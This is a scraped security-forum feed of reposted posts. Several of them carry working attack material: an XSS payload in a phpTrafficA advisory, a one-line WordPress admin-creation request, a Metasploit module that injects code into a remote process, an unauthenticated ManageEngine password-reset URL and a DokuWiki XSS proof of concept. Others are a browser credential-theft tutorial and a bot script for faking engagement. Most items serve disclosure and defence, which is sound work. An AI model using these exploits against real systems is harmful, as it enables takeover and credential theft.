business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright Š 2015 | Vulnerability Laboratory - [Evolution Security GmbH]â? -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source: http://packetstorm.wowhacker.com/1504-exploits/VL-1227.txt
  10. AddMeFast-Bot Automating the process of liking/subscribing/viewing etc... on addmefast.com in order to get points and benefit from their service Update: now working anymore, 01-10-2015 import mechanizeimport re from time import sleep import threading #cut something in many parts def chunkIt(seq, num): avg = len(seq) / float(num) out = [] last = 0.0 while last < len(seq): out.append(seq[int(last):int(last + avg)]) last += avg return out #generates a browser def genbrowser(): br = mechanize.Browser() br.set_handle_robots(False) br.set_handle_redirect(True) br.addheaders = [('User-agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.6.5')] return br class AMB(threading.Thread): # define environment variable def __init__(self, rangex, user, passw): self.br1 = genbrowser() self.alogin(self.br1, user, passw) self.range = rangex threading.Thread.__init__(self) self.timeout_value = 30 # log the user in def alogin(self, br, user, passw): br.open('http://addmefast.com', \ 'email={0}&password={1}&login_button=Login'.format(user.replace('@','%40'), passw)) if 'Welcome' in br.response().read(): print "Login successful on add me fast" #main function def run(self): sleep(1) for i in self.range: try: #goes to a page with many links to like #self.br1.open( #act=getLinksList&params={"network":"1", "page":"1", "isFBpage":"1"} self.br1.open( 'http://addmefast.com/includes/ajax.php', 'act=getLinksList&params={"network":"1", "page":"%s", "isFBpage":"1"}' % (i),timeout=self.timeout_value) #gets this : title="http://www.facebook.com/Ocacadordetrolls" id="L_b89734d43ed3a3dce20eeaab183365 page_and_Lid = re.findall('div class="freepts_row" title="(.*)" id="(.*)["]{1}>', self.br1.response().read()) #confirmSubscribe(162255, "http://www.facebook.com/TOKZ.cs", "02c08e63ec34b4c0b562ed71162255", "1", 0, "UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"); number_and_token = re.findall("""getFBLikesBef\((.*)[,]{1} ".*["]{1}, ".*["]{1}, "1", 0, "(.*)["]{1}\);""", self.br1.response().read()) i = 0 while i < len(page_and_Lid): page = page_and_Lid[0] Lid = page_and_Lid[1] number = number_and_token[0] token = number_and_token[1] #http://addmefast.com/includes/ajax.php, act=checkFollowed&params={"id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1"} self.br1.open('http://addmefast.com/includes/ajax.php','act=checkFollowed&params={"id":"%s", "url":"%s", "network":"1"}' % (number, page),timeout=self.timeout_value) #http://addmefast.com/includes/ajax.php, act=updateAction&params={"link_id":"L_b89734d43ed3a3dce20eeaab183365", "url":"http://www.facebook.com/Ocacadordetrolls", "network":"1", "IXY5pZpE":"UV9W49sV%2FYIQeuGBKkE7PauwNpaJf345m0G%2FDOM3SA6GKryoh8Vrk212"} self.br1.open('http://addmefast.com/includes/ajax.php','act=updateAction&params={"link_id":"%s", "url":"%s", "network":"1", "IXY5pZpE":"%s"}' % (Lid, page, token),timeout=self.timeout_value) print "New shit made" i+=1 except Exception, e: print e if __name__=='__main__': nbthreads = input('Number of threads: ') z = chunkIt(range(1,int(open("number.txt").read())+1), nbthreads) user, passw = open('account.txt').read().split(':', 1) while 1: for i in z: try: AMB(i, user, passw).start() except: pass while threading.activeCount() > 1: sleep(1) Source
  11. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Product: phpTrafficA Product page: phpTrafficA Homepage Affected versions: Up to and including 2.3 (latest as of writing). Description: The user agent string provided by the browser is not sanitized nor escaped when handled. This string is then outputting into HTML code on the "Latest visitors > Details" page, leading to HTML injection that can be abused to perform XSS. For example, the following user agent will cause a JavaScript dialogbox to pop up as soon as the page is visited: "><script>alert();</script> This page can be hidden from the public, in which case only admins can visit it. However, the script still executes when they do, which could enable a malicious user agent to steal the phpTrafficA cookie (no expiry) or other admin credentials. Proposed fix: Escape the HTML characters with htmlspecialchars before outputting the user agent string. In: Php/stats/statsRecent.inc.php Line 304: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,$agent)."</td><td>$page</td><td>$refString</td></tr>\n"; becomes: echo "<tr class=\"data av $even $clrobots $clreturn\"><td nowrap>$end</td><td> $dur</td><td align=\"center\"> ".format_float($hits)." </td><td> <a href=\"./index.php?mode=stats&sid=$sid&show=clickstream?=$lang&ip=$ip\" title=\"".$strings['Moreinfovisitor']."\" class=\"basic\">$ipText</a> </td><td align=\"center\"> ".format_float($visits)." </td><td>".countryFlag($country)."</td><td>".osImg($os,'')."</td><td>".browserImg($wb,htmlspecialchars($agent))."</td><td>$page</td><td>$refString</td></tr>\n"; Line 369: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": $thisagent<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; becomes: $echo = "<tr><td valign=\"top\" colspan=\"3\">$ip ($whoislink$baniplink)<br>$host<br>$labelTxt<table class=\"basic\"><tr><td>".countryNameFlag($country)."</td></tr></table></td><td valign=\"top\" colspan=\"2\">".$strings['Agent'].": ".htmlspecialchars($thisagent)."<br><table class=\"basic\"><tr><td>".osImgName($os)."</td><td>".browserImgName($wb)."</td></tr></table>".$strings['Referrer'].": "; Best regards, Daniel Geerts -----BEGIN PGP SIGNATURE----- Version: GnuPG/MacGPG2 v2.0.22 (Darwin) Comment: GPGTools - https://gpgtools.org iQIcBAEBCgAGBQJVJPGzAAoJEHn1bVIKHk5N5egP/0FRgNCiTwYyFwmqgcNLxOQ5 yuJtnGdGFvH0axXlvm+AgVYOtmM4erduSR3hCaSx4ER7f30SZkRCUuaW8aR1/Tow bdYzLXNHcY21gXkhHt+bWH7ZkEpUWxXR6ZzrwL5QO3Ez+QkDr1HUmg8QQPUia8Qk KGY+dbkRXqVR7MYRGjAbyceOEXpxpOtxaZ9UTSmQTGW31Upu+dmqkkOTbvV20tEj N07T4UwMffCGNWloeuXg8QvIlvwe22kV3+frA2qGxdWKHVl66iJAV0pQ+bxDgoxe Y3JsYKdeIhB6T0Yt7rpEbzlgaupQ9pg279bzGVVD4Z+AuNhvDY/4K6RZsFB11DGv eY4VR8KLyNuw5N/wLBGf9ZSL9dLBGatYxi0HoQtrmFqLppo1x6nhEV6A0gRulWRa 9L04PdWKmv+2/prwW9ygT7UFIdApT1q3Uljq9QQIWmdDxGx3YxFmvMVpC5NThtxO ElN8fhQpUKFss439qiLaGEMKO/D4bNC71Ydo6jvZOWQ+9eBxmMUT7XfK6fnB811c RTRON1SG73AWcbfpIJ/dM+g0jm6bcvVVQxNmaARdlf+E2ihXnMPU2k39ndfV/vqD 7iuZQraH1ZrQJAqjVmzHWvEfEPyeaiJPRguu1kmnG8QkSMDtBHIpGvvHCHSU4ioF +wxMYqlgbfJGakc4s5RO =wCVy -----END PGP SIGNATURE----- Source: http://packetstorm.wowhacker.com/1504-exploits/phptraffica23-xss.txt
  12. Long story short: wp-admin/admin-ajax.php?action=ae-sync-user&method=create&user_login=USERUL&user_pass=PAROLA&role=administrator Some credits: Vulnerabilities discovered by Evex
  13. Slider Pro is mostly a perfectly responsive plus press–empowered Wp slider plugin that will allows you to make expert and sophisticated sliders. This particular slider wordpress extension was in fact built utilizing user expertise in thoughts, determined to provide a clear and easy-to-use user interface within the administration area and also a soft nav expertise for the users. Download
  14. Testat 3 min in urma key ul si merge perfect .. Sters , pe motiv sa nu vada toti ratatii ...
  15. Abstract Web browsers or mobile browsers are software applications that act as the intermediary applications between a user and the World Wide Web and are used to access information from the Web. Some of the popular browsers which we are using in our daily life are Google Chrome, Mozilla Firefox, Internet Explorer, Opera, Safari, etc. With their wide usage and increasing popularity, they have become one of the major targets for exploitation by hackers. A small mistake during the coding of the application may result in it being vulnerable to intrusions. This article is going to cover a few browser-based attacks, which are not browser specific and can be exploited on any browser if not closed by the application developers during writing or designing the application. The following browser-based attacks, along with the mitigation, are going to be covered in this article: Browser cache: Obtaining sensitive information from the cache stored in browsers. Back and Refresh attack: Obtaining credentials and other sensitive data by using the Back button and Refresh feature of the browser. Passwords in browser memory: Getting the password or credit card details stored in the browser’s physical memory. Autocomplete: Obtaining the credentials of a user from the stored password in the browser. Browser history: Sensitive information leaked through the URL from the browser’s history. 1. Browser Cache Every time when a website is opened, the contents of that web page are sent to the browser’s temporary cache folder of a user’s machine. If those contents on that web page need to load again, the browser opens the page from the cache instead of downloading the page again. If some web application stores and shows the sensitive information to the user (such as their address, credit card details, username), this information could also be stored for caching, and hence it is retrievable through examining the browser’s cache. In IE, these pages are stored in C:\Users\<user_name>\AppData\Local\Microsoft\Windows\Temporary Internet Files In Firefox, these pages are stored in C:\Users\<user_name>\AppData\Local\Mozilla\Firefox\Profiles\<profile-id>\Cache Or by typing the following URL in the address bar of the browser: about:cache In Chrome, these pages are stored in C:\Users\<user_name>\AppData\Local\Google\Chrome\User Data\Default\Cache Or by typing the following URL in the address bar of the browser: chrome://cache Proof of Concept This demo is shown in the Mozilla Firefox browser. Log in to the application, access a few pages and then log out of the application. In the address bar, type about:cache. This shows the cache store in the browser. Go through the list and access the cache content of the website you are interested in. The following screenshot shows the URL for the user dashboard. The user dashboard can have sensitive information like address, phone number, mapped credit card details, e-mail ID, etc. On opening a specific cache entry, the user dashboard can be seen along with the address, phone number, order history, etc. This is shown in the following screenshot Mitigation This problem can be mitigated by setting proper cache control attributes in the response header. Mainly there are two types of cache attributes: 1. Cache-control: no-cache The no-cache attribute indicates that the browser should not use the information that is cached for that particular request–response pair. The browser stores the cache, but instead of showing the content from the cache, it sends the request to the server each time. But again, the cache will be only be in the browser and can be easily accessed by an attacker or malicious user. 2. Cache-control: no-store The no-store attribute indicates that the request–response pair should not be cached and stored in the browser. This applies to the entire page. 3. Using HTML meta tags You can implement the cache control using Meta tags also. Meta tags can be set as follows: <meta http-equiv=”Cache-Control” content=”no-cache” /> <meta http-equiv=”Cache-Control” content=”no-store” /> Here, if the cache-control header is manually appended in the HTTP response and set to no-cache, as shown in the following screenshot, the browser will still cache the page. If the browser cache is accessed, the cached pages of a user’s dashboard can be found. Opening it in Offline mode will show the order details, as shown in the screenshot below. Now, if the value of a cache-control header is set to no-store, no-cache and the browser cache is accessed, the cached pages of a user’s dashboard will not be found. This is shown in the following screenshots. Hence, the developer should analyze the web page content and implement proper cache-control attributes on the pages storing sensitive data. 2. Password in browser memory Most of the applications and servers store the password in hashed or encrypted format, but such hashing/encryption is not applied while storing passwords in the browser memory. The GET and POST requests on any sensitive page where the user is supplying sensitive information (like credentials, credit card number, etc.) is stored in the browser memory while it is open. An attacker with local access to the system can read the sensitive data using memory-reading tools like WinHex. An adversary with physical access to the user’s open browser, after logout, can thus steal the sensitive data from the memory. Once sensitive data like a password is discovered, attackers can escalate their privileges in the application. Proof of Concept Access the application. Enter the valid credentials, as shown in the following screenshot, and browse through the application. After logging out of the application, do not close the browser. Open any memory reading tool like “Winhex” and navigate to the following path, as shown in the screenshots below: Tools ? Open Ram ? Choose a browser (in this case Firefox) ? Select Entire Memory Search through the data using the username. The complete login request for that specific application can be obtained, as shown in the screenshot below. From here, an attacker can steal the login credentials of a user and escalate his privilege. Mitigation As this problem is present in the browser/local machine, using SSL will not mitigate this. A user can’t stop the browser from storing the password or other sensitive information. A solution has to be implemented through which the attacker can’t replay the password value obtained from the physical memory. So, the solution for this is to implement salted hashing. Instead of sending the password to the server, send the salted hash value of the password. Here is how the salted hashing technique works: Store the MD5 hash of the password in the database. (MD5 hash is a cryptographic technique in which the actual value can never be recovered). When a client requests for a login page, the server generates a random number called salt and sends it to the user along with the page. A JavaScript present on the client machine calculates the MD5 hash of the password entered by the user. It then combines the hash value with the salt value and recalculates the hash value. This hash value is sent to the server. The server picks the hash value of the password from its database, combines it with the salt value and calculates the MD5 hash value. If both the values match (it will happen only when the user enters the correct password), the user is authenticated to the application. Every time the salt value will be different; hence, even if the attacker gets the hashed password from the browser’s memory, he can’t replay it. Another solution could be implementing a JavaScript, which forcefully closes the browser once the user is logged out of the application. This will flush the complete memory of the browser, and hence no data can be retrieved from the browser’s memory. 3. Back and Refresh attack Browsers have the ability to maintain a recent record of pages that were visited by a user. The Back and Forward buttons on browsers use this functionality to display the pages recently browsed. In addition, browsers also keep track of variables like username, password, credit card details, etc. that were POSTed to the server while fetching the page. If a user logs in to the website, performs some actions and then logs out, and an adversary has access to the same machine as the user, he can see the logout page that is displayed on the browser window. He can then click the Back button until he reaches the page shown after a successful login. Here, the attacker can click the Refresh button, and the browser automatically resubmits the request with all the information. Proof of Concept Consider the Change Password page of an application: Log in to the application and access the Change Password page. Enter the values in the Current Password and New Password fields and click Submit. The request and response series for the Change Password request are shown in the following screenshots. Request Response The following screenshot shows that the password gets changed successfully. Browse through the application and then log out of the application. After logout, leave the machine without closing the browser window. An attacker who has physical access to this machine can simply click the Back button drop-down list and identify the page which comes after the Change Password page. This is depicted in the following screenshot. When a specific page is clicked, the browser displays the warning that the page has expired, as shown in the following screenshot. At this point the attacker can start a browser proxy tool like Burp and configure the browser to send its requests through the proxy. On the error page, the adversary clicks the Refresh button. The browser shows a pop-up warning to the user about reposting some of the variables in order to access the page, as shown in the screenshot below. The attacker clicks the “Resend” button. The attacker can see the request going to server using the configured proxy tool and can steal the password value of the user. This is shown in the screenshot below. Variation of the attack Many times it has been observed that the site is using redirection on successful login but not on unsuccessful login. If a login page is secured by CAPTCHA and the user provides the correct credentials but the wrong CAPTCHA value, then the user is again served with the login page with an error message. In this case too, an attacker can steal the credentials using the Back and Refresh features. Even if CAPTCHA is not implemented, an attacker can get some sensitive information like correct username or password. Proof of Concept Access the login page of the application and provide the correct username and wrong password, as shown in the following screenshot. After validating the credentials, the server responds with a “200 OK” with error stating “Username/Password is wrong”. This is shown in the screenshots below. Click the Back button and access the page which came after providing the incorrect credentials, as shown in the following screenshot. The browser warns that the document has expired and asks the user to resend the data to the server, as shown in the following screenshot. Configure the proxy between the browser and server and intercept the data going to the server. Click the “Resend” button. The user credentials can be seen in cleartext in the captured request, as shown in the following screenshot. Cause of problem The browser keeps track of the requests sent to server to fetch particular pages. In this case, the Change Password page is “changepass.aspx” and the page which appears after is “changepass1.aspx”. The “changepass1.aspx” page is displayed after providing the Current, New and Confirm Password values. So, the browser remembers the request which is sent to get the “changepass1.aspx” page. The following steps are present for the existing scenario: The user accesses the “changepass.aspx” page. The user types the current password, new password, and confirm new password and submits the request which is sent to “changepass1.aspx”. The user is authenticated in the “changepass1.aspx” page. The user is served with the “changepass1.aspx” page. When the attacker clicks the “changepass1.aspx” page, the request which was sent to render “changepass1.aspx” is resent to the server. This request contains the current, new and confirm new password values. Mitigation The following steps will be performed if an intermediate page is implemented between “changepass.aspx” and “changepass1.aspx”: The user accesses the “ChangePass.aspx” page. The user types the current password, new password, and confirm new password and submits the request to “CheckPass.aspx” The user is authenticated in the “CheckPass.aspx” page. The user is redirected to the “ChangePass1.aspx” page. The browser sends a new request to fetch the “ChangePass1.aspx” page. Now, even if an attacker refreshes the “changepass1.aspx” page, the request which the browser used to get “changepass1.aspx” will be sent, which is a redirect request sent by “CheckPass.aspx”. The request will be a simple GET request for fetching “ChangePass1.aspx” and there will be no value going in that request. The solution should be implemented on all the pages where a form is being submitted or some sensitive action is happening. 4. Autocomplete In many applications, when the user submits credentials, the browser shows a pop-up for remembering the password. If the user clicks “Remember password”, the browser will store the password and automatically enter it when the same application is accessed again. The feature is convenient for users, as they don’t have to remember and enter the password, but it poses a problem if the user is using this feature on a shared or public computer. An attacker can easily retrieve the stored password from the browser. Even if the stored passwords are encrypted or protected by the master password (a password to access the stored passwords), an attacker can retrieve this password by visiting the application, for which the password is stored, in the browser. An attacker enters the username and the browser automatically fills the password field. An attacker can run a proxy tool like Burp to intercept the request going to server and then can obtain the cleartext or encrypted password going to server. The saved password can be accessed by navigating to: Firefox: Options ? Security ? Saved Password Chrome: Settings ? Manage password (Under password and forms) IE: Internet Options ? Content ? AutoComplete Settings ? Manage Passwords Proof of Concept Here, after entering the credentials, the browser shows a popup asking the user if the password for the website should be remembered. This is depicted in the screenshot below. If the user clicks “Remember Me”, the password will be stored in the browser. In Firefox, the saved password can be accessed by navigating to Tools ? Options ? Security ? Saved Password. This is depicted in the following screenshot. When the “Saved Passwords” button is clicked, the browser shows the list of websites for which the passwords are stored in the browser. This is shown in the following screenshot. If the “Show Passwords” button is clicked, the user will be able to see the stored passwords, as shown in the screenshot below. Now, suppose the list of stored passwords is secured by a master password in the browser. Then the user has to enter the master password to access the list, as shown in the screenshot below. In this case, an adversary needs to use an intermediate proxy tool to intercept the request going to the server. Go to the application and double click the username field. It will show the list of the stored usernames. Click one username and the browser will automatically fill the password from the stored password list. This password can’t be seen, as it is hidden behind the asterisk symbol. A user can click the Submit button and capture the request going to server using a web proxy tool like Burp. From the intercepted request, it is easy to find the password of submitted username, as the data can be seen in cleartext. This is shown in the following screenshot. Mitigation The problem can be solved by setting the Autocomplete attribute in the Login and other sensitive pages. Make sure the Autocomplete attribute for all sensitive pages is set to “off”. A sensitive page can be the Login page, change password page, edit information page, etc. If Autocomplete is not configured on the page, then by default it is “ON” and the application will store the information. This can be done using the following command: < form autocomplete=”off”> – It will set Autocomplete to “OFF” for all form fields in the page. Even if the browser is configured to store the password, the above code will overwrite the browser settings. The Autocomplete attribute is ignored in the latest versions of all browsers. Hence, the above solution won’t work for the latest versions of the browsers. As a security best practice, a user should be warned with a generic warning message about storing the cleartext password in the browser. A more advanced way of implementation, involving HTML and JavaScript, can be used. A sample code is available here. 5. Browser history When a user submits any data, it goes to the server either in a GET request or in a POST request. In a GET request the user data is present in the URL itself, whereas in a POST request the user data is present in the body of the request. The following two screenshots show user data going in GET and POST requests. All GET requests that are accessed from the browser are stored in the browser’s history and cache. This data can be viewed even if the user is logged out or the browser is closed by checking the history of the browser. So, if an application sends the user’s sensitive information through a GET request, i.e. through URL, an attacker can obtain this data by checking the browser history. GET request: POST request: Proof of Concept Here, after entering the credentials on the website when the user clicks the LOG IN button, the credentials are sent in a GET request. This is shown in the following screenshot. The request going to server is captured in Burp, which shows that the user provided data is sent as a GET request. This is depicted in the following screenshot. So, an attacker who has physical access to the user’s machine can see these credentials in the browser’s history, as shown in the screenshot below. In the same way, if an application sends other sensitive data like credit card details through the GET request, the data can be accessed from the browser history. Mitigation Never send sensitive information in the GET request. Data containing sensitive information should be sent through the POST request. When sensitive information is sent in the POST request, the data goes in the request body, and hence can’t be accessed from the browser history, because the browser history only shows all the GET requests. Implement the POST method in the form as shown below: <form name=”login” action=”index_submit” method=”POST” accept-charset=”utf-8?> The above screenshots shows that no sensitive data is being stored in the browser history when the application is using POST instead of the GET method. Conclusion So, we have now discussed some browser-based attacks in this article. These attacks are applicable on web as well as mobile browsers. To perform any of the above attacks, an attacker has to depend on the following points: The attacker should have physical access to the victim’s machine. For some attacks, the browser should not be closed. The victim should not delete the browsing history, cache, etc. Due to all these limitations, the risk rating for all the above mentioned attacks ranges from Medium to Low, but depending on the information received, it can be high too. If an attacker can get account/credit/debit card details in the browser’s cache or through the Back and Refresh attack, then the risk rating would be high. All these vulnerabilities can be avoided by implementing the proper controls discussed in this article. References https://devcenter.heroku.com/articles/increasing-application-performance-with-http-cache-headers https://www.owasp.org/index.php/Testing_for_Vulnerable_Remember_Password_(OTG-AUTHN-005) http://repo.hackerzvoice.net/depot_cehv6/CEHv6%20Module%2059%20How%20to%20Steal%20Passwords/Stealing_passwords_via_browsers.pdf Source
  16. ## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Local include Msf::Post::Windows::Runas include Msf::Post::Windows::Priv def initialize(info = {}) super(update_info(info, 'Name' => "Windows Run Command As User", 'Description' => %q{ This module will login with the specified username/password and execute the supplied command as a hidden process. Output is not returned by default. Unless targetting a local user either set the DOMAIN, or specify a UPN user format (e.g. user@domain). This uses the CreateProcessWithLogonW WinAPI function. A custom command line can be sent instead of uploading an executable. APPLICAITON_NAME and COMMAND_LINE are passed to lpApplicationName and lpCommandLine respectively. See the MSDN documentation for how these two values interact. }, 'License' => MSF_LICENSE, 'Platform' => ['win'], 'SessionTypes' => ['meterpreter'], 'Author' => ['Kx499', 'Ben Campbell'], 'Targets' => [ [ 'Automatic', { 'Arch' => [ ARCH_X86 ] } ] ], 'DefaultTarget' => 0, 'References' => [ [ 'URL', 'https://msdn.microsoft.com/en-us/library/windows/desktop/ms682431' ] ], 'DisclosureDate' => 'Jan 01 1999' # Not valid but required by msftidy )) register_options( [ OptString.new('DOMAIN', [false, 'Domain to login with' ]), OptString.new('USER', [true, 'Username to login with' ]), OptString.new('PASSWORD', [true, 'Password to login with' ]), OptString.new('APPLICATION_NAME', [false, 'Application to be executed (lpApplicationName)', nil ]), OptString.new('COMMAND_LINE', [false, 'Command line to execute (lpCommandLine)', nil ]), OptBool.new('USE_CUSTOM_COMMAND', [true, 'Specify custom APPLICATION_NAME and COMMAND_LINE', false ]) ], self.class) end def exploit fail_with(Exploit::Failure::BadConfig, 'Must be a meterpreter session') unless session.type == 'meterpreter' fail_with(Exploit::Failure::NoAccess, 'Cannot use this technique as SYSTEM') if is_system? domain = datastore['DOMAIN'] user = datastore['USER'] password = datastore['PASSWORD'] if datastore['USE_CUSTOM_COMMAND'] application_name = datastore['APPLICATION_NAME'] command_line = datastore['COMMAND_LINE'] else command_line = nil windir = get_env('windir') # Select path of executable to run depending the architecture case sysinfo['Architecture'] when /x86/i application_name = "#{windir}\\System32\\notepad.exe" when /x64/i application_name = "#{windir}\\SysWOW64\\notepad.exe" end end pi = create_process_with_logon(domain, user, password, application_name, command_line) return unless pi begin return if datastore['USE_CUSTOM_COMMAND'] vprint_status('Injecting payload into target process') raw = payload.encoded process_handle = pi[:process_handle] virtual_alloc = session.railgun.kernel32.VirtualAllocEx(process_handle, nil, raw.length, 'MEM_COMMIT|MEM_RESERVE', 'PAGE_EXECUTE_READWRITE') address = virtual_alloc['return'] fail_with(Exploit::Failure::Unknown, "Unable to allocate memory in target process: #{virtual_alloc['ErrorMessage']}") if address == 0 write_memory = session.railgun.kernel32.WriteProcessMemory(process_handle, address, raw, raw.length, 4) fail_with(Exploit::Failure::Unknown, "Unable to write memory in target process @ 0x#{address.to_s(16)}: #{write_memory['ErrorMessage']}") unless write_memory['return'] create_remote_thread = session.railgun.kernel32.CreateRemoteThread(process_handle, nil, 0, address, nil, 0, 4) if create_remote_thread['return'] == 0 print_error("Unable to create remote thread in target process: #{create_remote_thread['ErrorMessage']}") else print_good("Started thread in target process") end ensure session.railgun.kernel32.CloseHandle(pi[:process_handle]) session.railgun.kernel32.CloseHandle(pi[:thread_handle]) end end end Source
  17. A vulnerability exists in the Manage Engine Desktop Central 9 application that affects version (build 90130). This may affect earlier releases as well. The vulnerability allows a remote unauthenticated user to change the password of any Manage Engine Desktop Central user with the ‘Administrator’ role (DCAdmin). The following proof of concept URL changes the ‘admin’ user password to ‘admin3’. http://<IP>:8020/servlets/DCOperationsServlet?operation=addOrModifyUser&roleId=DCAdmin&userName=admin&password=admin3 The XML response suggests the user modification failed, however a user can perform a successful login with the supplied credentials: <operation> <operationstatus>Failure</operationstatus> <message>Problem while modifying user admin in DC.</message> </operation> Complete control of the application can now be obtained by an unauthorised user. Vulnerability remediation: This vulnerability was fixed in Desktop Central build 90135. Refer to the vendor advisory for product update information and instructions. Vendor advisory: https://www.manageengine.com/products/desktop-central/unauthorized-admin-credential-modification.html Disclosure timeline: Vendor notification: 02/02/2015 Follow up with Vendor: 16/02/2015 Fixed released: 18/02/2015 CVE requested: 06/03/2015 CVE assigned: 20/03/2015 Vendor notification: 24/03/2015 Public disclosure: 27/03/2015 Source: http://dl.packetstormsecurity.net/1503-exploits/medc-escalate.txt
  18. When a company is breached, the typical reaction is to increase security across the board. But Twitch, the Amazon-owned game streaming company, has decided to reduce the minimum number of characters in user passwords, thereby allowing users to have less secure logins, in response to customer complaints. The attack was announced yesterday on a company blog, whilst emails were also sent to concerned users. There’s little detail on the extent of the attack; Twitch simply said all user passwords were to be reset after it detected possible unauthorized access to some Twitch user account information. According to the email sent to users, some cryptographic protections were used on passwords, but it wasn’t clear how strong they were. And it said it was possible passwords could have been captured in plain text by malicious code when users logged into the site on 3 March. Various kinds of data could have been compromised, including credit card information, in particular card type, a truncated card number and the expiration date. Usernames and associated email addresses, passwords, the last IP address users logged in from, phone number, address and date of birth were also potentially stolen. With all that information, a hacker would have a good chance of stealing a victim’s identity. Users started to complain en masse across Twitch’s social networks, however. Some said they couldn’t remember their password, others said when they tried to change their passwords to anything less than 20 characters they weren’t allowed, due to the site’s restrictions. Texan Twitch customer Corbin Ellis told the company on their Facebook page that “if users want to use bad passwords, that’s their problem, not yours”. Twitch caved to customer demands, announcing it would reduce the limit on minimum password length to eight characters minimum. Web security expert Troy Hunt told FORBES more than eight was surprisingly restrictive. “But what’s disheartening about this is that users have apparently baulked at creating passwords longer than eight characters so are clearly not getting the message on what constitutes a strong ‘secret’.” Authentication expert Per Thorsheim said it didn’t make sense to lower the length requirement after a breach. “I’d say on the contrary in many cases. In this specific case they have dramatically lowered their requirements. From a security perspective this could be justified by new and better ways of sending, [encrypting] and storing your passwords.” If any more evidence was needed that the username-password paradigm is a flawed form of authentication, the Twitch breach has provided. sursa: Amazon's Twitch Hacked, Caves To Angry User Demands For Less Secure Passwords - Forbes si-au cam luat la mumu twitch...
  19. Advisory ID: SGMA15-001 Title: DokuWiki persistent Cross Site Scripting Product: DokuWiki Version: 2014-09-29c and probably prior Vendor: www.dokuwiki.org Vulnerability type: Persistent XSS Risk level: Medium Credit: Filippo Cavallarin - segment.technology CVE: N/A Vendor notification: 2015-03-18 Vendor fix: 2015-03-19 Public disclosure: 2015-03-23 Details DokuWiki version 2014-09-29c (and probably prior) is vulnerable to Persistent Cross Site Scriptng in the admin page. An attacker may use this vulnerability to execute javascript in the context of a logged admin user. Since the vulnerable page has forms with the CSRF token (the same for all requests), a full backend compromise may be possible. To successfully exploit this vulenrability an attacked must: 1. have an account on the target site 2. trick and admin to visit a link or to edit user account Proof of concept: 1. change your account real name to: my name" autofocus onfocus="alert('code executed') 2. login as admin and try to edit the user profile from User Manager Solution Apply the latest hotfix from vendor's site References https://www.dokuwiki.org/ https://github.com/splitbrain/dokuwiki/issues/1081 Filippo Cavallarin https://segment.technology Source
  20. To be able to restric a Linux user to www folder and disable ssh access, in my example maned user_name, we should proceed some steps: 1) Edit file /etc/ssh/sshd_config and add the next lines AllowUsers [COLOR="#FF0000"]user_name[/COLOR] Match User [COLOR="#FF0000"]user_name[/COLOR] ChrootDirectory /var/www ForceCommand internal-sftp 2) Edit the file /etc/passwd like in the next example: [COLOR="#FF0000"]user_name[/COLOR]:1003:1002::/var/www:/bin/false 3) Add user to www-data group using command: usermod -a -G www-data [COLOR="#FF0000"]user_name[/COLOR] 4) The final step is to restart the ssh service to reload the configuration using one of the next commands: /etc/init.d/ssh restart or service ssh restart After this steps if we fill try to connect using ssh we will got the next message: root@kali:/home/razvan1# ssh [COLOR="#FF0000"]user_name[/COLOR]@192.168.1.1 [COLOR="#FF0000"]user_name[/COLOR]@192.168.1.1's password: This service allows sftp connections only. Connection to 192.168.1.1 closed. Author: razvan1@hy
